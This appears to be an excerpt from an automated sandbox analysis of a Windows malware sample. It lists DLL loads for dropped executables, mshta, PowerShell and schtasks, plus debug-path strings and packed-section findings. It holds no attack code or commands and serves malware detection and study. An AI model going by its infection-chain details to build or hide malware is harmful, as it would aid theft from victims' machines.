                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe
  Section loaded: apphelp.dll, wininet.dll, netapi32.dll, vaultcli.dll, wintypes.dll, dbghelp.dll, dsrole.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, ntmarta.dll, dpapi.dll, cryptbase.dll, mozglue.dll, winmm.dll, wsock32.dll, vcruntime140.dll, version.dll, msvcp140.dll, vcruntime140.dll, uxtheme.dll, windowscodecs.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe
  Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe
  Section loaded: iertutil.dll, wldp.dll, mshtml.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, cryptbase.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, windows.storage.dll, wldp.dll, propsys.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll (3 entries), dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, jscript9.dll, mpr.dll, scrrun.dll, version.dll, sxs.dll, profapi.dll, edputil.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, msls31.dll, d2d1.dll, dwrite.dll
Source: C:\Windows\SysWOW64\schtasks.exe
  Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (2 entries), cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
Source: C:\Windows\SysWOW64\timeout.exe
  Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe
  Section loaded: wldp.dll, mshtml.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, windows.storage.dll, wldp.dll, propsys.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll (3 entries), jscript9.dll, mpr.dll, scrrun.dll, version.dll, sxs.dll, profapi.dll, edputil.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, msls31.dll, d2d1.dll, dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (2 entries), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe
  Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe
  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE
  Section loaded: apphelp.dll, winmm.dll, wininet.dll, kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                                      Source: Window RecorderWindow detected: More than 3 window changes detected
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                      Source: M6gQuZPvgY.exeStatic file information: File size 2166784 > 1048576
                                      Source: M6gQuZPvgY.exeStatic PE information: Raw size of zwbixhzy is bigger than: 0x100000 < 0x1a1200
                                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599541837.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600168948.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\win32api.pdb source: trano1221.exe, 0000002A.00000002.1973015383.00007FF98B681000.00000040.00000001.01000000.0000003B.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\win32api.pdb!! source: trano1221.exe, 0000002A.00000002.1973015383.00007FF98B681000.00000040.00000001.01000000.0000003B.sdmp
                                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1589374900.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ucrtbase.pdb source: trano1221.exe, 0000002A.00000002.2026351473.00007FF98EA95000.00000002.00000001.01000000.0000001B.sdmp
                                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591172756.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: trano1221.exe, 0000002A.00000002.1975102681.00007FF98B9F1000.00000040.00000001.01000000.00000034.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588949427.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: trano1221.exe, 0000002A.00000002.1980923674.00007FF98C161000.00000040.00000001.01000000.0000002C.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1597912717.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599207028.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600305599.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: trano1221.exe, 00000023.00000003.1583189955.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2033979566.00007FF9AF531000.00000002.00000001.01000000.0000001D.sdmp
                                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589825821.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: trano1221.exe, 00000023.00000003.1583404038.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2031587031.00007FF9A75E5000.00000002.00000001.01000000.00000039.sdmp
                                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598486784.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1595664997.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599069389.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589063022.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: trano1221.exe, 0000002A.00000002.1975102681.00007FF98B9F1000.00000040.00000001.01000000.00000034.sdmp
                                      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.9 30 May 20233.0.9built on: Tue Jul 11 19:52:20 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: trano1221.exe, 0000002A.00000002.1980923674.00007FF98C161000.00000040.00000001.01000000.0000002C.sdmp
                                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591679400.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588680873.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589182480.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598930353.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: trano1221.exe, 0000002A.00000002.1996605213.00007FF98C9D1000.00000040.00000001.01000000.00000029.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: trano1221.exe, 0000002A.00000002.2029904114.00007FF9A06FC000.00000040.00000001.01000000.00000028.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: trano1221.exe, 0000002A.00000002.2030594224.00007FF9A3331000.00000040.00000001.01000000.00000027.sdmp
                                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593203015.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ucrtbase.pdbUGP source: trano1221.exe, 0000002A.00000002.2026351473.00007FF98EA95000.00000002.00000001.01000000.0000001B.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: trano1221.exe, 00000023.00000003.1583404038.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2031587031.00007FF9A75E5000.00000002.00000001.01000000.00000039.sdmp
                                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600657542.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589681525.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pywintypes.pdb source: trano1221.exe, 0000002A.00000002.1973847890.00007FF98B771000.00000040.00000001.01000000.00000038.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: trano1221.exe, 0000002A.00000002.1975488711.00007FF98BB50000.00000040.00000001.01000000.00000033.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pythoncom.pdb}},GCTL source: trano1221.exe, 0000002A.00000002.1973364756.00007FF98B6B1000.00000040.00000001.01000000.0000003A.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_elementtree.pdb source: trano1221.exe, 0000002A.00000002.1986859487.00007FF98C331000.00000040.00000001.01000000.00000036.sdmp
                                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1596701757.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591525735.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pywintypes.pdb** source: trano1221.exe, 0000002A.00000002.1973847890.00007FF98B771000.00000040.00000001.01000000.00000038.sdmp
                                      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588821073.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598775483.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: trano1221.exe, 00000023.00000003.1583189955.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2033979566.00007FF9AF531000.00000002.00000001.01000000.0000001D.sdmp
                                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1590455368.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599693153.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: trano1221.exe, 00000023.00000003.1592148006.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: trano1221.exe, 0000002A.00000002.2006486368.00007FF98E76B000.00000040.00000001.01000000.0000001C.sdmp
                                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591309503.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599866003.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600849374.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593372329.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598137593.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593530214.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: trano1221.exe, 00000023.00000003.1589513980.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: trano1221.exe, 0000002A.00000002.1980030194.00007FF98BD75000.00000040.00000001.01000000.0000002D.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: trano1221.exe, 0000002A.00000002.2029904114.00007FF9A06FC000.00000040.00000001.01000000.00000028.sdmp
                                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600027684.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1590256912.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589946129.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pythoncom.pdb source: trano1221.exe, 0000002A.00000002.1973364756.00007FF98B6B1000.00000040.00000001.01000000.0000003A.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1941606459.000001E16B3B0000.00000002.00000001.01000000.0000001E.sdmp
                                      Source: Binary string: D:\a\1\b\libssl-3.pdb source: trano1221.exe, 0000002A.00000002.1980030194.00007FF98BD75000.00000040.00000001.01000000.0000002D.sdmp
                                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599377266.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600505618.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: trano1221.exe, 0000002A.00000002.1984942451.00007FF98C2E1000.00000040.00000001.01000000.0000002B.sdmp

                                      Data Obfuscation

                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeUnpacked PE file: 0.2.M6gQuZPvgY.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 2.2.rapes.exe.240000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 3.2.rapes.exe.240000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEUnpacked PE file: 34.2.TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zwbixhzy:EW;murqhuul:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeUnpacked PE file: 45.2.c1f0508103.exe.2e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zzezzonx:EW;iactdlgu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zzezzonx:EW;iactdlgu:EW;.taggant:EW;
